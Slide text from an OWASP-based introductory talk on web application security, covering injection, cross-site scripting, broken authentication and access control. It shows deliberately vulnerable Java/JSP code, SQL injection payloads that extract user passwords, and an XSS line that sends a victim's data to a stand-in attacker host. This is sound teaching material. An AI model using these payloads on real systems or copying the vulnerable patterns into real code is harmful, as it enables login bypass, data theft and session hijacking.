Web Application Security

in a 🌰shell

An ultra-compact intro

Copyright (c) BjΓΆrn Kimminich / @bkimminich

BjΓΆrn Kimminich

🀐 Famous last words...

“Nobody would bother to hack us.”
“Our network firewall will keep us safe.”
“We have tests for all our use cases.”
“We will add security to the system later.”
“What's the worst that could happen?”

πŸ€” What is a Vulnerability?

A flaw or weakness in system security procedures, design, implementation, or internal controls that could […] result in a security breach or a violation of the system's security policy.

πŸ€” What is an Exploit?

A piece ofΒ software, a chunk of data, or a sequence of commands that takes advantage of a bugΒ or vulnerability to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized).

πŸ€” Who are the Attackers?

  • πŸ‘Ά Script Kiddies
  • 🌱 Hacktivists
  • πŸ’° Organized Crime
  • πŸ‘› Corrupt / 😑 Disgruntled Employees
  • 🏭 Competitors
  • πŸ¦… Nation States

πŸ’‰ Injection

πŸ‘¨β€βš–οΈ Injection Explained

Smuggling in unintended commands along with the data sent to an interpreter.
You go to court and write your name as "Michael, you are now free to go".
The judge then says "Calling Michael, you are now free to go" and the bailiffs let you go, because hey, the judge said so.

πŸ’» In software, interpreters are used for accessing...

  • Databases (SQL, HQL, ...)
  • Files (OS Shell, XPath, ...)
  • Access Control Systems (LDAP, ...)
  • ...

🚨 Risks from Injection vulnerabilities

  • Bypassing authentication
  • Spying out data
  • Manipulating data
  • Complete system takeover

πŸ”“ SQLI Authentication Bypass

String query = "SELECT id FROM users " +
           "WHERE name = '" + req.getParameter("username") + "'" +
           "AND password = '" + req.getParameter("password") + "'";

Generates queries like this:

SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'

πŸ—‘οΈ Attack Examples

Disabling password check for a known username:

SELECT id FROM users WHERE name = 'bjoern'--' AND password = '?'

Logging in without even knowing a username:

SELECT id FROM users WHERE name = '' or 1=1--' AND password = '?'

πŸ”­ Spying out Data with SQLI

String query =
        "SELECT * FROM books " +
        "WHERE title LIKE '%" + req.getParameter("query") + "%'";

Generates queries like this:

SELECT * FROM books WHERE title LIKE '%tangled web%'

πŸ—‘οΈ Attack Examples

❌ This will not work unless both result sets coincidentally have an equal number of columns:

SELECT * FROM books WHERE title LIKE '%'

❌ ❌ βœ… Probing for right number of result set columns:

SELECT * FROM books WHERE title LIKE '%'

SELECT * FROM books WHERE title LIKE '%'
UNION SELECT 1,2 FROM users--%'

SELECT * FROM books WHERE title LIKE '%'
UNION SELECT 1,2,3 FROM users--%'

Using known/guessed column names to extract data:

SELECT * FROM books WHERE title LIKE '%'
UNION SELECT name,email,password FROM users--%'

🎦 Demo

πŸ›‘οΈ Protection against Injection

  • Avoid Interpreters
  • Bind Variables
  • Prepared Statements
  • Least Privileges for app DB user
  • White List Input Validation

πŸ“œ Cross Site Scripting (XSS)

πŸ’€ Malicious Code is sent...

...to an innocent user's browser through, e.g. a link in a phishing email like the following:
Dear valued customer,

you might be intrerestred in our new special offer! We offer best quailty on the planet for the lowest price possible: Click here for special offer!

Bjorn (Chief Executive Officer)

πŸš’ Possible Damage from XSS

  • rewriting web page
  • redirecting to malicious site
  • stolen user session
  • stolen sensitive data

πŸ“œ XSS Vulnerability Example


Often the search terms are displayed above the results:

String keywords = request.getParameter("keywords");
List<Book> results = titleSearchService.search(keywords.split(" "));
There are <%=results.count()%> results for
your search terms <em><%=keywords%></em>
<% for (Book book : results) { %>
  // render result as table rows
<% } %>

πŸ—‘οΈ Attack Examples

Probing for XSS Vulnerability


Stealing User Session

  new Image().src="http://my.evil-si.te/hijack.php?c="

Site Defacement


🎦 Demo

πŸ›‘οΈ Protection against XSS

  • Avoid including user supplied input into output
  • Output encode all user supplied input
  • Sanitize HTML where user supplied HTML is unavoidable
  • White List Input Validation

πŸ”‘ Broken Authentication

πŸ€¦β€ Typical Authentication Flaws

  • Allowing weak passwords
  • Storing sensitive data insecurely
  • Using insecure http connection
  • ...

🏹 Side Channel Attack Vectors

  • Change Password
  • “Remember me”
  • Forgot Password
  • Secret Questions

🎦 Demo

πŸ›‘οΈ Securing Authentication

  • Centralized and standardize authentication
  • Protect credentials with SSL/TLS1
  • Use strong mechanism with multiple factors
  • Do not store or log unencrypted credentials2

1Serve a HSTS header from your site to protect against protocol downgrade attacks. Also consider applying to have your domain included in the HSTS preload list of Chromium.

2 Best avoid to store credentials at all. If you must, use only brute-force resistant algorithms for password hashing, preferrably Argon2 the winner of the Password Hashing Competition.

πŸšͺ Broken Access Control

πŸ”“ Common Authorization Mistakes

  • Hiding things w/o restricting access
  • Displaying only authorized links and menu choices
  • Trusting client-side access control mechanisms
  • Lack of server-side verification of user privileges

πŸƒ Request Tampering Examples

How could we escalate our privileges here?




🎦 Demo

πŸ›‘οΈ Securing Access Control

  • Never rely on “Security by obscurity”
  • Restrict data and functionality access
  • Enforce user or role based permissions

❓ Q&A

πŸ‘ Credits

Presentation created with reveal.js

The HTML Presentation Framework

Based on free material provided by OWASP

The Open Web Application Security Project

Background image based on Digital Shodan

by sephiroth-kmfdm


Copyright (c) BjΓΆrn Kimminich / @bkimminich

Creative Commons License
This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.